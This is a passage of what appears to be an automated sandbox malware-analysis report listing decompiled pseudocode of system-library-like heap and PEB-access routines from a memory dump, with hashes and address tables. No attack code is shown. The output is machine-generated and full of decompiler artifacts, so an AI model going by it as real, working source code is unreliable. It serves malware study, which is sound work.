                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                        • Instruction ID: 597c89325361e623f0e8409cab0e22b902b803c9b714fc67464efbcd0afd0773
                        • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                        • Instruction Fuzzy Hash: 75E09B323409406BD7119E55DC84F97776EEF82725F0440B9F5055E252D6F5DD098BA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 94%
                        			E02C52073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                        				void* __esi;
                        				signed char _t3;
                        				signed char _t7;
                        				void* _t19;
                        
                        				_t17 = __ecx;
                        				_t3 = E02C4FD22(__ecx);
                        				_t19 =  *0x2c8849c - _t3; // 0x0
                        				if(_t19 == 0) {
                        					__eflags = _t17 -  *0x2c88748; // 0x0
                        					if(__eflags <= 0) {
                        						E02C51C06();
                        						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                        						__eflags = _t3;
                        						if(_t3 != 0) {
                        							L5:
                        							__eflags =  *0x2c88724 & 0x00000004;
                        							if(( *0x2c88724 & 0x00000004) == 0) {
                        								asm("int3");
                        								return _t3;
                        							}
                        						} else {
                        							_t3 =  *0x7ffe02d4 & 0x00000003;
                        							__eflags = _t3 - 3;
                        							if(_t3 == 3) {
                        								goto L5;
                        							}
                        						}
                        					}
                        					return _t3;
                        				} else {
                        					_t7 =  *0x2c88724; // 0x0
                        					return E02C48DF1(__ebx, 0xc0000374, 0x2c85890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                        				}
                        			}







                        0x02c52076
                        0x02c52078
                        0x02c5207d
                        0x02c52083
                        0x02c520a4
                        0x02c520aa
                        0x02c520ac
                        0x02c520b7
                        0x02c520ba
                        0x02c520bc
                        0x02c520c9
                        0x02c520c9
                        0x02c520d0
                        0x02c520d2
                        0x00000000
                        0x02c520d2
                        0x02c520be
                        0x02c520c3
                        0x02c520c5
                        0x02c520c7
                        0x00000000
                        0x00000000
                        0x02c520c7
                        0x02c520bc
                        0x02c520d4
                        0x02c52085
                        0x02c52085
                        0x02c520a3
                        0x02c520a3

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9785b4d61cde4fcd924d1157c8256b15e72b20e2b2dee4ce0f20f62fa04622a9
                        • Instruction ID: b4eeeab106f654705de29b570cca6cda86aaa6830baa08cb00e3acf33fcab968
                        • Opcode Fuzzy Hash: 9785b4d61cde4fcd924d1157c8256b15e72b20e2b2dee4ce0f20f62fa04622a9
                        • Instruction Fuzzy Hash: 62F027768531A84ADE366F2428003D22BD1CFC5210F4A4A46EC5017608CB34CAD3DF99
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 43%
                        			E02C68D34(intOrPtr __ecx, intOrPtr __edx) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				short _v42;
                        				char _v48;
                        				signed char* _t12;
                        				intOrPtr _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t25;
                        				signed int _t26;
                        
                        				_t23 = __edx;
                        				_v8 =  *0x2c8d360 ^ _t26;
                        				_v16 = __ecx;
                        				_v42 = 0x1c2b;
                        				_v12 = __edx;
                        				if(E02BB7D50() == 0) {
                        					_t12 = 0x7ffe0386;
                        				} else {
                        					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v48);
                        				_push(8);
                        				_push(0x20402);
                        				_push( *_t12 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                        			}













                        0x02c68d34
                        0x02c68d43
                        0x02c68d4b
                        0x02c68d4e
                        0x02c68d52
                        0x02c68d5c
                        0x02c68d6e
                        0x02c68d5e
                        0x02c68d67
                        0x02c68d67
                        0x02c68d79
                        0x02c68d7a
                        0x02c68d7c
                        0x02c68d81
                        0x02c68d94

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cad5b04e978e36811a898410194cef1db394abc81b3e665d28b607df39e4e920
                        • Instruction ID: 7cf77f5321935eaf4d1ccf56a3b60f49b1bfdc82aa5d312d2e06859d6fb50df6
                        • Opcode Fuzzy Hash: cad5b04e978e36811a898410194cef1db394abc81b3e665d28b607df39e4e920
                        • Instruction Fuzzy Hash: 56F0BE70E04608AFCB04EFB8D845BBEB7B4EF48300F108499E906EB280EA34D900CB64
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 36%
                        			E02C68B58(intOrPtr __ecx) {
                        				signed int _v8;
                        				intOrPtr _v20;
                        				short _v46;
                        				char _v52;
                        				signed char* _t11;
                        				intOrPtr _t17;
                        				intOrPtr _t22;
                        				intOrPtr _t23;
                        				intOrPtr _t24;
                        				signed int _t25;
                        
                        				_v8 =  *0x2c8d360 ^ _t25;
                        				_v20 = __ecx;
                        				_v46 = 0x1c26;
                        				if(E02BB7D50() == 0) {
                        					_t11 = 0x7ffe0386;
                        				} else {
                        					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v52);
                        				_push(4);
                        				_push(0x402);
                        				_push( *_t11 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                        			}













                        0x02c68b67
                        0x02c68b6f
                        0x02c68b72
                        0x02c68b7d
                        0x02c68b8f
                        0x02c68b7f
                        0x02c68b88
                        0x02c68b88
                        0x02c68b9a
                        0x02c68b9b
                        0x02c68b9d
                        0x02c68ba2
                        0x02c68bb5

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f64a28dce3c4763ba83d9533f9658bf4973f38cb58e822268019449c857abe82
                        • Instruction ID: a005b07057b8d551a2b386f90cb44cf6f1d4e8ec5e5222e2e9b3450f23ff2eeb
                        • Opcode Fuzzy Hash: f64a28dce3c4763ba83d9533f9658bf4973f38cb58e822268019449c857abe82
                        • Instruction Fuzzy Hash: ABF082B1A04659ABDB14EBB8D946EBEB3B4EF44304F440599F915DB3C0FA74D900CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B94F2E(void* __ecx, char _a4) {
                        				void* __esi;
                        				void* __ebp;
                        				void* _t17;
                        				void* _t19;
                        				void* _t20;
                        				void* _t21;
                        
                        				_t18 = __ecx;
                        				_t21 = __ecx;
                        				if(__ecx == 0) {
                        					L6:
                        					__eflags = _a4;
                        					if(__eflags != 0) {
                        						L8:
                        						E02C688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                        						L9:
                        						return 0;
                        					}
                        					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                        					if(__eflags != 0) {
                        						goto L9;
                        					}
                        					goto L8;
                        				}
                        				_t18 = __ecx + 0x30;
                        				if(E02BBC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x2b71030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                        					goto L6;
                        				} else {
                        					return 1;
                        				}
                        			}









                        0x02b94f2e
                        0x02b94f34
                        0x02b94f38
                        0x02bf0b85
                        0x02bf0b85
                        0x02bf0b89
                        0x02bf0b9a
                        0x02bf0b9a
                        0x02bf0b9f
                        0x00000000
                        0x02bf0b9f
                        0x02bf0b94
                        0x02bf0b98
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bf0b98
                        0x02b94f3e
                        0x02b94f48
                        0x00000000
                        0x02b94f6e
                        0x00000000
                        0x02b94f70

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: aa991c0a72ec54b77b20049fee35cc2cb87fc43412aee7c42254097803badab8
                        • Instruction ID: 2b1e0f8bdd936dba28f4d6acef2b6416406fa60a33db4c3f833f0c612e217f54
                        • Opcode Fuzzy Hash: aa991c0a72ec54b77b20049fee35cc2cb87fc43412aee7c42254097803badab8
                        • Instruction Fuzzy Hash: 5AF0E2325296848FDBB1E718C184B22B7E4EF087B8F0448F5D50587937E724EC49C640
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 36%
                        			E02C68CD6(intOrPtr __ecx) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				short _v38;
                        				char _v44;
                        				signed char* _t11;
                        				intOrPtr _t17;
                        				intOrPtr _t22;
                        				intOrPtr _t23;
                        				intOrPtr _t24;
                        				signed int _t25;
                        
                        				_v8 =  *0x2c8d360 ^ _t25;
                        				_v12 = __ecx;
                        				_v38 = 0x1c2d;
                        				if(E02BB7D50() == 0) {
                        					_t11 = 0x7ffe0386;
                        				} else {
                        					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v44);
                        				_push(0xffffffe4);
                        				_push(0x402);
                        				_push( *_t11 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                        			}













                        0x02c68ce5
                        0x02c68ced
                        0x02c68cf0
                        0x02c68cfb
                        0x02c68d0d
                        0x02c68cfd
                        0x02c68d06
                        0x02c68d06
                        0x02c68d18
                        0x02c68d19
                        0x02c68d1b
                        0x02c68d20
                        0x02c68d33

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 848c23b735b2621cb61203aff740c0f1d5b77c947501b1e6bfbdc3534d375ef9
                        • Instruction ID: 9304fa1462da7d63d765ec2ec2d4ce5f6579869f94917e744c0237f8536740f1
                        • Opcode Fuzzy Hash: 848c23b735b2621cb61203aff740c0f1d5b77c947501b1e6bfbdc3534d375ef9
                        • Instruction Fuzzy Hash: D2F08271A04609ABCB04DFB9E945EAEB7B4EF49304F100699F916EB2C0EA34D904CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E02BB746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                        				signed int _t8;
                        				void* _t10;
                        				short* _t17;
                        				void* _t19;
                        				intOrPtr _t20;
                        				void* _t21;
                        
                        				_t20 = __esi;
                        				_t19 = __edi;
                        				_t17 = __ebx;
                        				if( *((char*)(_t21 - 0x25)) != 0) {
                        					if(__ecx == 0) {
                        						E02BAEB70(__ecx, 0x2c879a0);
                        					} else {
                        						asm("lock xadd [ecx], eax");
                        						if((_t8 | 0xffffffff) == 0) {
                        							_push( *((intOrPtr*)(__ecx + 4)));
                        							E02BD95D0();
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                        							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                        							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                        						}
                        					}
                        					L10:
                        				}
                        				_t10 = _t19 + _t19;
                        				if(_t20 >= _t10) {
                        					if(_t19 != 0) {
                        						 *_t17 = 0;
                        						return 0;
                        					}
                        				}
                        				return _t10;
                        				goto L10;
                        			}









                        0x02bb746d
                        0x02bb746d
                        0x02bb746d
                        0x02bb7471
                        0x02bb7488
                        0x02bff92d
                        0x02bb748e
                        0x02bb7491
                        0x02bb7495
                        0x02bff937
                        0x02bff93a
                        0x02bff94e
                        0x02bff953
                        0x02bff956
                        0x02bff956
                        0x02bb7495
                        0x00000000
                        0x02bb7488
                        0x02bb7473
                        0x02bb7478
                        0x02bb747d
                        0x02bb7481
                        0x00000000
                        0x02bb7481
                        0x02bb747d
                        0x02bb747a
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 51bad72f8d1610f6b6381bea90c8544ec4ed10527ef90dc40eadbc94bda539ad
                        • Instruction ID: 7b85449549367c40e4afd4406bfda73b7d87b98faa1e3c0d6e7e0b304d686dba
                        • Opcode Fuzzy Hash: 51bad72f8d1610f6b6381bea90c8544ec4ed10527ef90dc40eadbc94bda539ad
                        • Instruction Fuzzy Hash: 32F0E936E05144ABDF03A768C840BF9FBB2EF84315F0842E5D951AB550EFE4D800DB85
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BCA44B(signed int __ecx) {
                        				intOrPtr _t13;
                        				signed int _t15;
                        				signed int* _t16;
                        				signed int* _t17;
                        
                        				_t13 =  *0x2c87b9c; // 0x0
                        				_t15 = __ecx;
                        				_t16 = L02BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                        				if(_t16 == 0) {
                        					return 0;
                        				}
                        				 *_t16 = _t15;
                        				_t17 =  &(_t16[2]);
                        				E02BDFA60(_t17, 0, _t15 << 2);
                        				return _t17;
                        			}







                        0x02bca44b
                        0x02bca453
                        0x02bca472
                        0x02bca476
                        0x00000000
                        0x02bca493
                        0x02bca47a
                        0x02bca47f
                        0x02bca486
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bd65978bd56348a8019cf5ad0627d5361fc8d4c583fe09b3843f8aa0ab830379
                        • Instruction ID: f790e3e823303e3f18393d10da454a7e59de812da3adc65724b275fdc0a7b0c4
                        • Opcode Fuzzy Hash: bd65978bd56348a8019cf5ad0627d5361fc8d4c583fe09b3843f8aa0ab830379
                        • Instruction Fuzzy Hash: 97E09272A41821ABD2125E68AC40FA6B3AEEBD5651F1D4479E905C7210E678DD11C7E0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 79%
                        			E02B9F358(void* __ecx, signed int __edx) {
                        				char _v8;
                        				signed int _t9;
                        				void* _t20;
                        
                        				_push(__ecx);
                        				_t9 = 2;
                        				_t20 = 0;
                        				if(E02BCF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                        					_t20 = L02BB4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                        				}
                        				return _t20;
                        			}






                        0x02b9f35d
                        0x02b9f361
                        0x02b9f367
                        0x02b9f372
                        0x02b9f38c
                        0x02b9f38c
                        0x02b9f394

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                        • Instruction ID: f92fad519add758821b703b7c3c2ea239711633e43ba5f113d2ecead9b0891e7
                        • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                        • Instruction Fuzzy Hash: 6CE0D832A40118BBCF219BD99D05FBABBBDDB44B60F1041E5F904D7550D5789D00C6D0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BAFF60(intOrPtr _a4) {
                        				void* __ecx;
                        				void* __ebp;
                        				void* _t13;
                        				intOrPtr _t14;
                        				void* _t15;
                        				void* _t16;
                        				void* _t17;
                        
                        				_t14 = _a4;
                        				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x2b711a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                        					return E02C688F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                        				} else {
                        					return E02BB0050(_t14);
                        				}
                        			}










                        0x02baff66
                        0x02baff6b
                        0x00000000
                        0x02baff8f
                        0x00000000
                        0x02baff8f

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 538f00ece3e3a67f17884796a2b00fa04eb3974a546f112d64424e1b3510b001
                        • Instruction ID: a8f1b495d375f8b2954587641e5751ef6999671b032786b56621a07960472a40
                        • Opcode Fuzzy Hash: 538f00ece3e3a67f17884796a2b00fa04eb3974a546f112d64424e1b3510b001
                        • Instruction Fuzzy Hash: 3DE09AB120E2049FD734DB55D1F0FBA3798DF42721F1984D9E0084B901C723D880C656
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02C4D380(void* __ecx, void* __edx, intOrPtr _a4) {
                        				void* _t5;
                        
                        				if(_a4 != 0) {
                        					_t5 = L02B9E8B0(__ecx, _a4, 0xfff);
                        					L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                        					return _t5;
                        				}
                        				return 0xc000000d;
                        			}




                        0x02c4d38a
                        0x02c4d39b
                        0x02c4d3b1
                        0x00000000
                        0x02c4d3b6
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                        • Instruction ID: 33222c9a01ad689004c949229550b6f297a0cc70f1817dafc979984b948e68ac
                        • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                        • Instruction Fuzzy Hash: 23E0CD31240244F7DF226E45CC00F757B26DF40794F104071FD095A690CA71DD51DAC4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E02C241E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                        				void* _t5;
                        				void* _t14;
                        
                        				_push(8);
                        				_push(0x2c708f0);
                        				_t5 = E02BED08C(__ebx, __edi, __esi);
                        				if( *0x2c887ec == 0) {
                        					E02BAEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                        					if( *0x2c887ec == 0) {
                        						 *0x2c887f0 = 0x2c887ec;
                        						 *0x2c887ec = 0x2c887ec;
                        						 *0x2c887e8 = 0x2c887e4;
                        						 *0x2c887e4 = 0x2c887e4;
                        					}
                        					 *(_t14 - 4) = 0xfffffffe;
                        					_t5 = L02C24248();
                        				}
                        				return E02BED0D1(_t5);
                        			}





                        0x02c241e8
                        0x02c241ea
                        0x02c241ef
                        0x02c241fb
                        0x02c24206
                        0x02c2420b
                        0x02c24216
                        0x02c2421d
                        0x02c24222
                        0x02c2422c
                        0x02c24231
                        0x02c24231
                        0x02c24236
                        0x02c2423d
                        0x02c2423d
                        0x02c24247

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a58773be8431b10577fb4ae0d0a7f9a8527ec6b92cf7015d33410a0e5ab5c00b
                        • Instruction ID: f755d7e4d8843cdf912d15b7a09ae1bd4ffc82618c0580e1de8164d3a3c22275
                        • Opcode Fuzzy Hash: a58773be8431b10577fb4ae0d0a7f9a8527ec6b92cf7015d33410a0e5ab5c00b
                        • Instruction Fuzzy Hash: C5F06DB8D90708CFDBB0EFA9D91070436B9F784B10F80CB6AE00187A84CBB44598CF21
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BCA185() {
                        				void* __ecx;
                        				intOrPtr* _t5;
                        
                        				if( *0x2c867e4 >= 0xa) {
                        					if(_t5 < 0x2c86800 || _t5 >= 0x2c86900) {
                        						return L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                        					} else {
                        						goto L1;
                        					}
                        				} else {
                        					L1:
                        					return E02BB0010(0x2c867e0, _t5);
                        				}
                        			}





                        0x02bca190
                        0x02bca1a6
                        0x02bca1c2
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bca192
                        0x02bca192
                        0x02bca19f
                        0x02bca19f

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b4ed28ba26e3c1ccd11a90d60f663a21e63afa942a253fbcdbd097fa00028a06
                        • Instruction ID: 63b5d009158d14918c89e770852387989d88c8cc32d4b2e30db829ebec9531b2
                        • Opcode Fuzzy Hash: b4ed28ba26e3c1ccd11a90d60f663a21e63afa942a253fbcdbd097fa00028a06
                        • Instruction Fuzzy Hash: 8BD05EB22610485AC72E7F109D54B37221BEFC5B18F3088CDF1474AAE0DEA0CCE4D689
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BC16E0(void* __edx, void* __eflags) {
                        				void* __ecx;
                        				void* _t3;
                        
                        				_t3 = E02BC1710(0x2c867e0);
                        				if(_t3 == 0) {
                        					_t6 =  *[fs:0x30];
                        					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                        						goto L1;
                        					} else {
                        						return L02BB4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                        					}
                        				} else {
                        					L1:
                        					return _t3;
                        				}
                        			}





                        0x02bc16e8
                        0x02bc16ef
                        0x02bc16f3
                        0x02bc16fe
                        0x00000000
                        0x02bc1700
                        0x02bc170d
                        0x02bc170d
                        0x02bc16f2
                        0x02bc16f2
                        0x02bc16f2
                        0x02bc16f2

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 09a793a6ad4a6594cd7fa425dfd177a52deb1450f4739ed779b964aa4da9049e
                        • Instruction ID: e75709a7c2d4dbe4e0debc26e7c202747d2e5ff404edac7997bc79c7f813f684
                        • Opcode Fuzzy Hash: 09a793a6ad4a6594cd7fa425dfd177a52deb1450f4739ed779b964aa4da9049e
                        • Instruction Fuzzy Hash: 58D0A77111010052DA2D6F189814B152256EB80B89F3800FCF10FA94C2CFB0CC92E448
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02C153CA(void* __ebx) {
                        				intOrPtr _t7;
                        				void* _t13;
                        				void* _t14;
                        				intOrPtr _t15;
                        				void* _t16;
                        
                        				_t13 = __ebx;
                        				if( *((char*)(_t16 - 0x65)) != 0) {
                        					E02BAEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                        					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                        				}
                        				if(_t15 != 0) {
                        					L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                        					return  *((intOrPtr*)(_t16 - 0x64));
                        				}
                        				return _t7;
                        			}








                        0x02c153ca
                        0x02c153ce
                        0x02c153d9
                        0x02c153de
                        0x02c153e1
                        0x02c153e1
                        0x02c153e6
                        0x02c153f3
                        0x00000000
                        0x02c153f8
                        0x02c153fb

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                        • Instruction ID: 932bd4c71197c67ba46fd8f1bb1df360389eb89fec5af2d07e9f4c5608beffc6
                        • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                        • Instruction Fuzzy Hash: 7DE08C32A046809BCF12DB49C6A0F5EB7F6FBC5B40F540094A0086F620C764ED00DB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BAAAB0() {
                        				intOrPtr* _t4;
                        
                        				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                        				if(_t4 != 0) {
                        					if( *_t4 == 0) {
                        						goto L1;
                        					} else {
                        						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                        					}
                        				} else {
                        					L1:
                        					return 0x7ffe0030;
                        				}
                        			}




                        0x02baaab6
                        0x02baaabb
                        0x02bfa442
                        0x00000000
                        0x02bfa448
                        0x02bfa454
                        0x02bfa454
                        0x02baaac1
                        0x02baaac1
                        0x02baaac6
                        0x02baaac6

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                        • Instruction ID: b72ed326e42b0c80a2a80ad9d26013fca2646479c1cec6d53dd4bab1ced1d622
                        • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                        • Instruction Fuzzy Hash: 34D0C235252A80CFD65A9B59C564B1573A4FB44A44FC504D0E9058B661E728D954CA10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BC35A1(void* __eax, void* __ebx, void* __ecx) {
                        				void* _t6;
                        				void* _t10;
                        				void* _t11;
                        
                        				_t10 = __ecx;
                        				_t6 = __eax;
                        				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                        					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                        				}
                        				if( *((char*)(_t11 - 0x1a)) != 0) {
                        					return E02BAEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        				}
                        				return _t6;
                        			}






                        0x02bc35a1
                        0x02bc35a1
